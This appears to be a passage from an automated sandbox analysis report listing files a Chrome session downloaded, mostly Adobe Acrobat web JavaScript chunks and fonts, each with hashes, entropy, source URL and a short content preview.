                  Size (bytes):28326
                  Entropy (8bit):4.29277345373752
                  Encrypted:false
                  SSDEEP:
                  MD5:42DF9A5567C3C99560A1CCC28DF62476
                  SHA1:340F211624B18E5BA8992A3E3145A87DA14E556E
                  SHA-256:98EDDB8C9A965F96BD1518CC4547969C643D39AAA113A77A798828D742875911
                  SHA-512:42E9BE2A86872A97F0D9CB10639DCE3923E790323FDCB600B43C825835BC7251F0A2BBE97C04BE667D4F4E8CE8B3E32C658C37E6FBCDBBF65EF31845FF60C09B
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-pdfverbs-web/3.60.0_4.1247.0/24-24-icons.js
                  Preview:(self["webpackJsonp-pdfverbs-web"]=self["webpackJsonp-pdfverbs-web"]||[]).push([[983,8819],{KltA:(C,e,l)=>{var t=l("YWiy");function A12CompressPDF24(C){return t.createElement("svg",C,t.createElement("g",{fill:"none",fillRule:"evenodd"},[t.createElement("path",{fill:"#26C0C7",fillRule:"nonzero",d:"M4 15.2088397L4 20.8450012C4 21.5634921 4.49946918 21.9479712 5.2040863 22L18.6710205 22C19.3889161 22 19.977064 21.4440134 20.0290488 20.7388111L20.0327839 20.6370968 20.0327839 15.2574463 21.0184021 16.1906128 20.9375 20.9234001C20.9375 22.0121426 20.0871333 22.9021045 19.0148759 22.9642845L18.894855 22.9677549 5.03627929 22.9697993C3.94844766 22.9697993 3.0592298 22.1187211 2.99710178 21.0455658L2.99363426 16.1906128 4 15.2088397zM5.09403947 1.00772415L15.6902478 1.00772415C16.0959934 1.00660343 16.4869268 1.15161604 16.7925771 1.4135829L16.8912052 1.50519679 20.5134541 4.97799158C20.8023297 5.2658521 20.9782179 5.64577867 21.0123241 6.04898909L21.0184021 6.18416057 21.0184021 7.90342508 20
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Web Open Font Format (Version 2), TrueType, length 43596, version 1.0
                  Category:downloaded
                  Size (bytes):43596
                  Entropy (8bit):7.9952701440723475
                  Encrypted:true
                  SSDEEP:
                  MD5:2A05E9E5572ABC320B2B7EA38A70DCC1
                  SHA1:D5FA2A856D5632C2469E42436159375117EF3C35
                  SHA-256:3EFCB941AADDAF4AEA08DAB3FB97D3E904AA1B83264E64B4D5BDA53BC7C798EC
                  SHA-512:785AB5585B8A9ED762D70578BF13A6A69342441E679698FD946E3616EF5688485F099F3DC472975EF5D9248AFAAD6DA6779813B88AA1DB60ABE2CC065F47EB5F
                  Malicious:false
                  Reputation:unknown
                  URL:https://4fsv.iatrivvbe.com/GDSherpa-vf.woff2
                  Preview:wOF2.......L.......P..............................U...z...?HVAR.;?MVARF.`?STAT...H/L.....@..P..>.0....6.$..x. .....{[.q....Rl....t..~v....(....T.t.;..n'..v=....?...l].xI...m."..?hNX.,...8.;G...m,}.h.>(=[...m/.>....8&f..&.......].u...&.VD..].<..yR.eb<,x......)..c..t...k...9..o.T..R9..kq..TR%U..v....r._......D...f..=qH...8.<...x..(V.I.h.L3*#]8...-.z.........3.9V..........u.........x.....S_...\1...&6...j^...c;()m.J.....>....xz..Y...|.7......!.jw...,.L.;N.......n......].....8].R..d.....`.R.B..#..,...1R.UJD..b.`.0<....FA=..{.....`....c...R..Uy..J.k.".j..N.{w..UT<.8T66...H,...FH.GS.G.]......?.T.!4..8...B...l.p@.......t.o...v...b.g..?..m..!.%.....x..MC1M...........k...})..+N.....Q_yS.X.11a....&`..'".xZ..=b^...iD...} .. ..b...}DIvu.q....k.4.....@.....P*..j..)..'.L......b..RQjI*I..Qk.T.l._wO..$....!c..%.{.._N..E@....A...?...aW.y.gf.g.&E... ~.x.b....b...~......f/.....G....J.6.y.....zE@T.a.0^Ul......S:..,..}..B.R..Rt~.v...L:`4.IKA..V...x&@...h.7.P.....*.
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:HTML document, ASCII text, with very long lines (745), with no line terminators
                  Category:downloaded
                  Size (bytes):745
                  Entropy (8bit):4.932467956418764
                  Encrypted:false
                  SSDEEP:
                  MD5:7E839354B85F2E143DB501A2B85E03B6
                  SHA1:9DEF67AE2244448935054EC5117ECFD492B77266
                  SHA-256:674FED77505A3C0BD12DB8710AC954554558F47916C526F830308FE2B96C37CA
                  SHA-512:D6940D520F465EF1CB53E6FC58CF7CED38A8F386E21D4479EDA79082B0EB27E54B9A215C83AE538C1F7C846232C8136FC4481CFA7B16ABB43C04E7D715661F03
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dcpreviewdropin/3.46.1_2.1134.0/printHelper.html
                  Preview:<!doctype html><html><head><meta charset="utf-8"/><meta http-equiv="X-UA-Compatible" content="chrome=1"/><meta name="referrer" content="never"/><meta http-equiv="Content-Security-Policy" content="base-uri 'self'; block-all-mixed-content; default-src 'none'; frame-src blob:; object-src blob:;script-src 'self'; style-src 'self'; worker-src 'none';"></head><body><div id="spinner-container"><div class="spinner"><div class="track"></div><div class="fills"><div class="fillMask1"><div class="fillSubMask1"><div class="fill"></div></div></div><div class="fillMask2"><div class="fillSubMask2"><div class="fill"></div></div></div></div></div><p>Preparing the file for print.</p></div><script src="printHelper_main.fe9e0a8b.js"></script></body></html>
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (4330)
                  Category:downloaded
                  Size (bytes):4379
                  Entropy (8bit):4.375577950983542
                  Encrypted:false
                  SSDEEP:
                  MD5:2E63D496E68BF767E315606088842AE3
                  SHA1:0061AF806DB504D6539E37B62A9CA7873FA0EC5D
                  SHA-256:8C02536F1C452CF893340CE1F5EB8B06085261041AF2041F8DAF670F892D5A37
                  SHA-512:3267154D9800A92CC54CA14499C9DBC2EC293111AA5EDBA531F4CD54E9C554A3E4830735C9EBC830B012678D15610BD5726A37A984EE1EE1CCD3DFE79081FE25
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-pdfverbs-web/3.60.0_4.1247.0/convert-icon.js
                  Preview:(self["webpackJsonp-pdfverbs-web"]=self["webpackJsonp-pdfverbs-web"]||[]).push([[5571],{"7eDv":(e,C,t)=>{var l=t("YWiy");function SCategoryConvert18(e){return l.createElement("svg",e,l.createElement("g",{fill:"none",fillRule:"evenodd"},[l.createElement("path",{fill:"#707070",fillRule:"nonzero",d:"M5 14L2.38 14C2.1701318 14 2 13.8298682 2 13.62L2 12.38C2 12.1701318 2.1701318 12 2.38 12L5 12 5 10.2C5.0099758 10.1097714 5.0894516 10.0435415 5.18 10.05 5.2236287 10.0476071 5.2665328 10.0619085 5.3 10.09L7.91 12.92C7.9699702 12.9810728 7.9699702 13.0789272 7.91 13.14L5.3 15.91C5.2269334 15.9685001 5.1230666 15.9685001 5.05 15.91 5.0198566 15.8810929 5.001959 15.8417182 5 15.8L5 14zM5 8C2.2385763 8 0 10.2385763 0 13 0 15.7614237 2.2385763 18 5 18 7.7614237 18 10 15.7614237 10 13 10 10.2385763 7.7614237 8 5 8zM8.92587353 8.98830508C9.0706394 8.70627729 9.20470323 8.4188253 9.32776669 8.12656125 9.52507046 7.65729822 9.69694215 7.20977553 9.8638915 6.72082314 9.41882997 5.73635525 9.30397538 4
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Unicode text, UTF-8 text, with very long lines (2369)
                  Category:downloaded
                  Size (bytes):18413
                  Entropy (8bit):5.569230065488367
                  Encrypted:false
                  SSDEEP:
                  MD5:63EE68A1025BF11F112C621693B6B41A
                  SHA1:D219656D24A253695B167BCFCFEFD63397318011
                  SHA-256:1C4741C3C08428D4999ED2C77DEB909CF7BE4CBC6CB2161278A6CB7C8F8E337F
                  SHA-512:56EAE584F7B9B13262F5E91F01D957E5113064DDAF049C0E9667B07B1C460F1A2271F9737D9E1AB09741B9451B9C5BC434D701D85A9F19B638D7E536AF68FA8C
                  Malicious:false
                  Reputation:unknown
                  URL:https://use.typekit.net/bxf0ivf.js
                  Preview:/*. * The Typekit service used to deliver this font or fonts for use on websites. * is provided by Adobe and is subject to these Terms of Use. * http://www.adobe.com/products/eulas/tou_typekit. For font license. * information, see the list below.. *. * adobe-clean:. * - http://typekit.com/eulas/000000000000000000017701. * - http://typekit.com/eulas/000000000000000000017702. * - http://typekit.com/eulas/000000000000000000017703. * - http://typekit.com/eulas/0000000000000000000176ff. * - http://typekit.com/eulas/000000000000000000017704. * - http://typekit.com/eulas/000000000000000000017706. *. * . 2009-2025 Adobe Systems Incorporated. All Rights Reserved.. */.if(!window.Typekit)window.Typekit={};window.Typekit.config={"a":"19707152","c":[".tk-adobe-clean","\"adobe-clean\",sans-serif",".tk-adobe-clean-condensed","\"adobe-clean-condensed\",sans-serif"],"fi":[7180,7181,7182,7184,7185,22474],"fc":[{"id":7180,"family":"adobe-clean","src":"https://use.typekit.net/af/cb695f/000000
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with no line terminators
                  Category:downloaded
                  Size (bytes):77
                  Entropy (8bit):4.37144473219773
                  Encrypted:false
                  SSDEEP:
                  MD5:B6652DF95DB52FEB4DAF4ECA35380933
                  SHA1:65451D110137761B318C82D9071C042DB80C4036
                  SHA-256:6F5B4AA00D2F8D6AED9935B471806BF7ACEF464D0C1D390260E5FE27F800C67E
                  SHA-512:3390C5663EF9081885DF8CDBC719F6C2F1597A4E25168529598097E9472608A4A62EC7F7E0BC400D22AAC81BF6EA926532886E4DC6E4E272D3B588490A090473
                  Malicious:false
                  Reputation:unknown
                  URL:https://commerce.adobe.com/mini-apps/_next/static/NFyq2_IiLM-i_2GSsWdQF/_ssgManifest.js
                  Preview:self.__SSG_MANIFEST=new Set,self.__SSG_MANIFEST_CB&&self.__SSG_MANIFEST_CB();
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Unicode text, UTF-8 text, with very long lines (23672), with no line terminators
                  Category:downloaded
                  Size (bytes):23690
                  Entropy (8bit):5.12080415265133
                  Encrypted:false
                  SSDEEP:
                  MD5:62AC48FB2C6A07FA1890A4F8ABBFC036
                  SHA1:67860A8848F7BBCDA4778E2A7A2793089019DB59
                  SHA-256:FE8934B82BFAA705C679A4423A950C7859E86A9DD2B58E4CDB2573A0517F8BCB
                  SHA-512:67F4322B907AA29488888D6787B31F872598529DF0E3933A7518F31A8E4D28CE0162E41D2CEAB42B1FD770861DD541E30079D09CF291388A33975318408D94ED
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-fillsign2-dropin/3.17.1_1.498.0/translations-en-US-json-chunk.js
                  Preview:"use strict";(self["webpackJsonp-fillsign2"]=self["webpackJsonp-fillsign2"]||[]).push([[3577],{R5i5:e=>{e.exports=JSON.parse('{"verb.fillsign.frictionless.description.seo":"Drag and drop a PDF to use the Acrobat PDF form filler."}')},t39f:e=>{e.exports=JSON.parse('{"fillsign.bootstrap.label":"Fill & Sign","fillsign.bootstrap.tooltip":"Fill and sign documents electronically","fillsign.bootstrap.modernViewer.tooltip":"Fill and sign your document or request e-signatures","fillsign.bootstrap.label.service":"Fill & Sign Service","verb.upload.error.only_accept_one_file":"Only one file can be uploaded at a time.","verb.upload.error.unsupported_type":"Unsupported file type.","verb.upload.error.file_too_large":"File too large.","verb.upload.error.empty_file":"This file is empty.","verb.upload.error.invalid_file":"Error with file upload. Your file may be corrupted or password protected.","verb.upload.error.max_page_count":"This file has too many pages to be processed. Maximum pages allowed: ","v
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Web Open Font Format (Version 2), CFF, length 38976, version 1.0
                  Category:downloaded
                  Size (bytes):38976
                  Entropy (8bit):7.994496028599995
                  Encrypted:true
                  SSDEEP:
                  MD5:3DC8E6938118F5FA1AF3E7A5A98BAA66
                  SHA1:03CD9EE2CD0B7CD881FA75FF4A7369E68BD2154A
                  SHA-256:3D75BB0A01BC2FD0E963F6879634C371B205CA4DA67021B0F453592337DCC001
                  SHA-512:E54C11536A137510F0150C4A36001C81B2F8FF16E639FBC39E72218B1C5335CB3D43A7641DDF146E3CC0E7A338DC9D0F56006FE5659B91749F3C5C82A002F0DE
                  Malicious:false
                  Reputation:unknown
                  URL:https://use.typekit.net/af/4b3e87/000000000000000000017706/27/l?primer=0635fba006f1437d962ae878ad04a353e0c3568e4d5bde3554eb7e3e05ddd02d&fvd=n9&v=3
                  Preview:wOF2OTTO...@....................................F...*?DYNA.i?GDYN.Q..B.`..P...6.$..@....7. ..... ..q....CDE..E$..........W...?../~.....O...?.....E`...:.EuUd....Z...u..x.?.g..N3I..{.......XI*.I:.Z.hB.z...q.\....LT..1.ir.....@..@g6.L..yZ.X..Y...2....3.H...E...E.i..dedGV"..<.U.:5.\...'?...q...Ih?..!,.n...u`..cE.."k..r......d......4l..6o.[4...M..h..K........^...! ......`OL...S.I............!Bd.....O..o~...+.b.K$N.a.5-.$k:a.0...z'........F*....q.........Y..-q.a@.........s..@8(.qGA....#.$.B.T.n....Z...._.T......!..|...A..>....-x..d.._V...)...v..~&..L.i.'.?..]%o.'...I~..).~:L..@c..g...d....r.a....8.N...:;$..._ .x"..=.S......X..U-[~.MI.XF9.~S[.....?.............D`fW.f.s.b.......)JN..\.)u.j......E..!M+..^*.%@.@.l.o..V.f3&.a..I..%l....3..l.e.T..$'.3Y........Zl....).*.K-.=.T..........h]<.U....P...'.......i..D.Z...FA.m.B*\...\..b.{...hK..-}.......*?.T.].{V./~M....A;.OL.v.=.v@...d.j.....:...C....F"...%P.....9X..X....8........x..x.....T..R.jM..'. w.P..d.B
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (28041)
                  Category:downloaded
                  Size (bytes):28089
                  Entropy (8bit):4.7068435652292955
                  Encrypted:false
                  SSDEEP:
                  MD5:AD83879D3B3B1995D63876CEF585B242
                  SHA1:199901683D06FABFF7762C995F82C13A06ECB1B2
                  SHA-256:CA45C932A6B6917D5C92286C824BC17B11879C5FA4786EA4E7C6B9E1514B8E7C
                  SHA-512:BAF88ADB5B5FEE8B981DCA38AEE2DDBCA053EA2DB6994E74401FF6E26108530B43972436D65C2CD01E7010D941951D5ABD523CE8C103AD9635A3C2B1E45E6780
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-ccverbs-dropin/3.17.1_2.303.0/24-24-icons.js
                  Preview:(self["webpackJsonp-ccverbs-dropin"]=self["webpackJsonp-ccverbs-dropin"]||[]).push([[983],{QEeY:(e,c,l)=>{var t=l("YWiy");function A12CCXCustomPage(e){return t.createElement("svg",e,[t.createElement("path",{d:"M21.34375,9H11.65625c-1.46688,0-2.65625,1.21987-2.65625,2.72436v9.55128c0,1.50449,1.18937,2.72436,2.65625,2.72436h9.6875c1.46688,0,2.65625-1.21987,2.65625-2.72436V11.72436c0-1.50449-1.18937-2.72436-2.65625-2.72436Zm-3.10338,10.61522l-1.53259-3.57642c-.08233-.19412-.34899-.19293-.43072,.00119l-.75108,1.78642c-.06622,.15721,.04892,.33049,.21954,.33049,0,0,.37882-.00298,.40268-.00298,.57987,0,1.04996,.46983,1.04996,1.04803s-.46831,1.04684-1.04698,1.04803h-2.35645c-.7469,0-1.2516-.75982-.96167-1.447l2.11603-5.02997c.2613-.61989,.87338-1.02302,1.54631-1.02302s1.27905,.40195,1.54094,1.02005l2.12975,5.03057c.29172,.68777-.21298,1.44879-.96167,1.44879-.35317-.00119-.75347-.15661-.96406-.63418Z",fill:"var(--iconIndigo, #5258e4)",key:0}),t.createElement("path",{d:"M7,20c0,.71131,.14853,1.3
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (12111)
                  Category:downloaded
                  Size (bytes):12158
                  Entropy (8bit):5.579747894924617
                  Encrypted:false
                  SSDEEP:
                  MD5:1C1D454F35888874D0F6464A3B8F4F5A
                  SHA1:2D91A8E632B12F3F1606846C8C78200D87B4FEEB
                  SHA-256:143EEE56BF7F494EF423BD0C4CAD3651393398FF686C3399E9F122BA479BB4F8
                  SHA-512:C72A8689896819D756FFCCB7332A685FDF241976A6F060E9C989B6A1773B87D61FE0D071C0BF83ADE0B8E6BEB27EF5390115915F2D9684681CA0B4A8091DF156
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-fillsign2-dropin/3.17.1_1.498.0/5868-chunk.js
                  Preview:(self["webpackJsonp-fillsign2"]=self["webpackJsonp-fillsign2"]||[]).push([[5868],{"32It":(e,t,a)=>{"use strict";a.d(t,{y:()=>useSignatureTool});var o=a("YWiy"),r=a("8dmp"),i=a("1ZEG"),n=a("6BuV"),l=a("ZAFT"),s=a("YDJZ"),d=a("fl0F"),c=a("B99j"),_=a("a3iC");const useSignatureTool=()=>{const[e,t]=(0,o.useState)(r.N.getSelectionType()),[a,g]=(0,o.useState)(null),[u,p]=(0,o.useState)(!1);(0,o.useEffect)((()=>{(async()=>{const e=await i.r$.getSignatures();p(!0),g(e)})().then((()=>{}));i.r$.addObserver((async e=>{let{action:t,field:a}=e;if(t===_.xj.SIGNATURES||t===_.xj.ADD_FIELD&&a.serverOp===_.U3.CREATE_FIELD&&[_.PU.SIGNATURE,_.PU.INITIALS].includes(a.type)){const e=await i.r$.getSignatures();g(e)}}))}),[]);return{selectedTool:e,setSelectedTool:t,sigData:a,setSigData:g,initialized:u,removeScribble:async e=>{const t=await i.r$.getSignatures(),a={};e===c.Lg.INITIALS?a[c.Lg.SIGNATURE]=t[c.Lg.SIGNATURE]:a[c.Lg.INITIALS]=t[c.Lg.INITIALS],g(a),i.r$.setSignatures(a),i.r$.deleteSignature(e).then((()
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text
                  Category:downloaded
                  Size (bytes):284
                  Entropy (8bit):5.3677361090495515
                  Encrypted:false
                  SSDEEP:
                  MD5:B3D820A5C5C3E51D2032DA7BC6F817B2
                  SHA1:0373B6B5723104FAA4E0B0B9D457E79E40B4CB96
                  SHA-256:F7272361C710791B0AD0B3F8EA719EE331C23F7157C0A92FABD938C71B52A84C
                  SHA-512:252E2036529DE547AD7AFEA5136C6F72E4FC4CB89AA1363D7CEA332024BD941EBB6CF56AEF60CC964E7A4F9658A4C746D013CB15C23BB57598AB5E2DBEAE108C
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-global-nav-dropin/3.58.0_3.586.0/modal-container-chunk.js
                  Preview:"use strict";(self["webpackJsonp-global-nav"]=self["webpackJsonp-global-nav"]||[]).push([[863],{"45AD":(a,e,l)=>{l.r(e),l.d(e,{default:()=>s});var n=l("1eri"),o=l("ZreS");const s={ModalContainer:n.Z,ModalContainerAPI:o.Z}}}]);.//# sourceMappingURL=private/modal-container-chunk.js.map
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (1467)
                  Category:downloaded
                  Size (bytes):1516
                  Entropy (8bit):5.1172778810958155
                  Encrypted:false
                  SSDEEP:
                  MD5:2BED55D5C196AD062948DA0F99D40E4C
                  SHA1:4604F5EE4D4C9DA753EA62BCCB574690C587BCC2
                  SHA-256:93C8F858FC00FF87AC71F820ADD66DC8D8610999A1DA3340C8DD90EEDFE2EBB5
                  SHA-512:B1DF5DCAD46B3E9C59D70AE562411CCAF811017553B5304B9FB1FB8D6D81076B902A2F9FC5A8E74A0B329AE57A54C673030D61BAE24890D126BE4B877FE258F6
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-organize-verbs-dropin/3.17.1_2.683.0/viewer-icons.js
                  Preview:(self["webpackJsonp-organize-verbs"]=self["webpackJsonp-organize-verbs"]||[]).push([[7511],{l7zj:(e,a,l)=>{var i=l("YWiy");function SDCOrganizePages18N(e){return i.createElement("svg",e,i.createElement("g",null,[i.createElement("path",{d:"M5.30273,1.55322A3.75027,3.75027,0,0,0,2.32941,4.52039L1.963,2.91731a.5.5,0,0,0-.59883-.376l-.00017,0L.876,2.653a.5.5,0,0,0-.3758.599l.82986,3.62554a.5.5,0,0,0,.59895.37584l.03566-.00956L5.51932,6.14866a.5.5,0,0,0,.33064-.625l-.14715-.47791a.5.5,0,0,0-.625-.33071l-1.31538.40517A2.26453,2.26453,0,0,1,7.87307,3.942a.48482.48482,0,0,0,.591.15731l.46455-.19893a.5061.5061,0,0,0,.22347-.741A3.74733,3.74733,0,0,0,5.30273,1.55322Z",fill:"var(--iconFill, #464646)",key:0}),i.createElement("path",{d:"M2.00038,9.00046a1,1,0,1,1-1,1A1,1,0,0,1,2.00038,9.00046Zm6,0a1,1,0,1,1-1,1A1,1,0,0,1,8.00038,9.00046Zm-3,0a1,1,0,1,1-1,1A1,1,0,0,1,5.00038,9.00046Zm0,6a1,1,0,1,1-1,1A1,1,0,0,1,5.00038,15.00046Zm-3-3a1,1,0,1,1-1,1A1,1,0,0,1,2.00038,12.00046Zm0,3a1,1,0,1,1-1,1A1,1,0,
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (28673)
                  Category:downloaded
                  Size (bytes):28738
                  Entropy (8bit):5.351230065749754
                  Encrypted:false
                  SSDEEP:
                  MD5:4A6890D847DBFBD5B4273081A0110C33
                  SHA1:F5CEA917563F21E11E4330C16F66778C3ED9DD54
                  SHA-256:4FD10002D37C241BA5414E0936302EDCA21064E0B0BD1F237AA700C099DBA017
                  SHA-512:512876C21C93C509E43D40AA02F165C69E746D21DAC0D2FD77F638448D993A67CE504F8C2B5CAEBB67C1C22FDFA687F89C0D27303B4083DD686A52BF479CF46E
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-sign-authoring2-dropin/3.59.4_4.1119.0/pdf-request-signatures-chunk.js
                  Preview:"use strict";(self["webpackJsonp-sign-authoring2"]=self["webpackJsonp-sign-authoring2"]||[]).push([[4701],{Kdnz:function(e,t,i){i.d(t,{g:function(){return withLouserzation}});var n=i("plsW"),o=i("YWiy"),r=i("Zm2D"),s=i("bon+");const withLouserzation=function(){let e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:s.Z;return t=>{var i;return(i=class WithLouserzation extends o.Component{constructor(t){super(t),this.loadMessages=async()=>{const t=n.locale2.getLocale(),i=await e(t);this.setState({messages:i,userLocale:t})},this.loadMessages(),this.state={messages:globalThis.adobe_dc_sdk.authoringMessages,userLocale:n.locale2.getLocale()}}render(){const{messages:e,userLocale:i}=this.state;return e&&i?o.createElement(r.IntlProvider,{messages:e,locale:i},o.createElement(t,this.props)):null}}).WrappedComponent=t,i}}},"7pbj":function(e,t,i){i.r(t),i.d(t,{default:function(){return K}});var n=i("plsW"),o=i("Fuzs"),r=i("WCAd"),s=i("6RRo"),a=i("BbF9"),l=i("IelE"),d=i("Kvo4"),c=i("7MNv"),__aw
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:JSON data
                  Category:dropped
                  Size (bytes):67
                  Entropy (8bit):4.477975339802428
                  Encrypted:false
                  SSDEEP:
                  MD5:C3580CCF344B1830394347602470BEE0
                  SHA1:E6BAA565929752C6BD2F54AE47ACFD97E3A4756A
                  SHA-256:280A35B0EFC3CF4DDBA8DF401FAC95F82A0FA8D7B5DE241CCBB0D1A6A066F1C8
                  SHA-512:505AEE226CED8D7F2D28CA07B9D5A7F674C1AAAF46778735FD452244C008B3DBAFBEAD51457FF1A67932D0526BBA9C1EA1378F2D4BE6C3F96EB3B1BAB5651AA0
                  Malicious:false
                  Reputation:unknown
                  Preview:{"country":"US","state": "MA","Accept-Language" : "en-US,en;q=0.9"}
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (1698)
                  Category:downloaded
                  Size (bytes):1756
                  Entropy (8bit):5.442042976533389
                  Encrypted:false
                  SSDEEP:
                  MD5:CDA72D070F944C79CD2EF0504B461279
                  SHA1:4F48584C4AF8579FDE9A203F1A9BD267D7184DB3
                  SHA-256:007360F9F885D0CF46ED1AB304405F3F21CF8F9E3753E5E5EBFC9D744BB96FDF
                  SHA-512:5934C8EB50D96EC9D9158B54E192FEC427E7EA166CF5EE302E3727A73F6F82AA97DDD6CC9CECDD693AE1F2B0E40ADE69FBE1BC58592BCEB3A295A39A9510818A
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-home3-dropin/3.58.0_1.572.0/promotion-tiles-chunk.js
                  Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="c0f1a9c2-a467-4c4a-abb0-b1d0cd899333",e._sentryDebugIdIdentifier="sentry-dbid-c0f1a9c2-a467-4c4a-abb0-b1d0cd899333")}catch(e){}}();var _global="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};_global.SENTRY_RELEASE={id:"263853adbe3f8c6ef3e7fe097b0d550acf2a7b0f"},(self["webpackJsonp-home3"]=self["webpackJsonp-home3"]||[]).push([[6474],{Vvp6:(e,n,t)=>{t.r(n),t.d(n,{LouserzablePromotionTiles:()=>LouserzablePromotionTiles,LouserzedPromotionTiles:()=>u,RoutedPromotionTiles:()=>RoutedPromotionTiles,default:()=>g});var o=t("YWiy"),a=t("Zm2D"),s=t("/hLX"),r=t.n(s),l=t("plsW"),d=t("x6CA"),i=t("qN0T"),c=t("FNOK"),f=t("TAfI");function _extends(){return _extends=Object.assign?Object.assign.bind():function(e){for(var n=1;n<arguments.length;
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (65536), with no line terminators
                  Category:downloaded
                  Size (bytes):876672
                  Entropy (8bit):5.3493747224752815
                  Encrypted:false
                  SSDEEP:
                  MD5:8D7937B4E2A84255CDA8AF1AB85C2530
                  SHA1:D11C25597F6C93BD288D6E94C4CEB61CCBF5493E
                  SHA-256:D9FE1F3B67D1CCDB83D78FE93C81A3961278B277D0007DC7ECD0A2A830C5B616
                  SHA-512:DE99176CEA17FEA3266D80453021E13F7DBED351A281A309E569C969C454B6352B8441DAE9965479D8B6E04635DFD1B89AAC6C686EAF416815A5EA076B2939EA
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-core/3.71.0/dc-spectrum-v3-core.js
                  Preview:(()=>{var e={kmCo:(e,t,r)=>{"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.AlertSmall=s;var n,o=(n=r("GiK3"))&&n.__esModule?n:{default:n};function i(){return i=Object.assign||function(e){for(var t=1;t<arguments.length;t++){var r=arguments[t];for(var n in r)Object.prototype.hasOwnProperty.call(r,n)&&(e[n]=r[n])}return e},i.apply(this,arguments)}function s(e){var t=e.scale,r=void 0===t?"M":t,n=function(e,t){if(null==e)return{};var r,n,o=function(e,t){if(null==e)return{};var r,n,o={},i=Object.keys(e);for(n=0;n<i.length;n++)r=i[n],t.indexOf(r)>=0||(o[r]=e[r]);return o}(e,t);if(Object.getOwnPropertySymbols){var i=Object.getOwnPropertySymbols(e);for(n=0;n<i.length;n++)r=i[n],t.indexOf(r)>=0||Object.prototype.propertyIsEnumerable.call(e,r)&&(o[r]=e[r])}return o}(e,["scale"]);return o.default.createElement("svg",i({},n,n),"L"===r&&o.default.createElement("path",{d:"M8.564 1.289L.2 16.256A.5.5 0 0 0 .636 17h16.728a.5.5 0 0 0 .436-.744L9.436 1.289a.5.5 0 0 0-.872 0zM10 14.75a.25
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (65460)
                  Category:downloaded
                  Size (bytes):1778002
                  Entropy (8bit):5.4813450993569734
                  Encrypted:false
                  SSDEEP:
                  MD5:F5CF9FEC04B40E44084E0C7BB03AD904
                  SHA1:187B0B95C91DDF4669EBB9505685A103E1F0FDED
                  SHA-256:1937C471F8DFC6325452C69CDF37F0BF6C6FA2AD68FA21EB11231AFF4956C62A
                  SHA-512:887A30018EE7B18A1865B30DE5C11C1A11A94CCF77E7E403A19085C0942911B8EB1E91DB9623EC23862051ABEDB15BA15BA2BCC8653B9683A7BA4AF0C002A968
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-viewer-dropin/3.62.0_1.1389.1/viewerDropin-chunk.js
                  Preview:/*! For license information please see viewerDropin-chunk.js.LICENSE.txt */.(self["webpackJsonp-viewer"]=self["webpackJsonp-viewer"]||[]).push([[7383],{rmjt:(e,t,r)=>{"use strict";var i=r("AAps");Object.defineProperty(t,"Zb",{enumerable:!0,get:function get(){return n.default}});var n=i(r("NRbv")),o=i(r("Jh2l")),s=i(r("vDin")),a=i(r("CyEC")),l=i(r("WGSU"))},NRbv:(e,t,r)=>{"use strict";var i=r("AAps");Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;var n,o,s,a=i(r("z3HK")),l=i(r("jp00")),c=i(r("QNma")),d=i(r("vPca")),u=i(r("khqL")),p=i(r("qavZ")),h=i(r("qJYQ")),m=i(r("i44B")),_=i(r("AAps")),f=i(r("uqI5")),v=i(r("da+B")),y=i(r("PZ3W")),b=i(r("vsH4")),S=i(r("e1tA")),E=r("f6H/"),A=i(r("/hLX")),O=i(r("YWiy"));r("gA9v");var I={"cs-CZ":(0,_.default)(r("54Yc")).default,"da-DK":(0,_.default)(r("tONz")).default,"de-DE":(0,_.default)(r("TLeo")).default,"en-US":(0,_.default)(r("Y756")).default,"es-ES":(0,_.default)(r("KAkQ")).default,"fi-FI":(0,_.default)(r("9lK2")).default,"fr-FR
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (16865)
                  Category:downloaded
                  Size (bytes):16914
                  Entropy (8bit):5.361104893511508
                  Encrypted:false
                  SSDEEP:
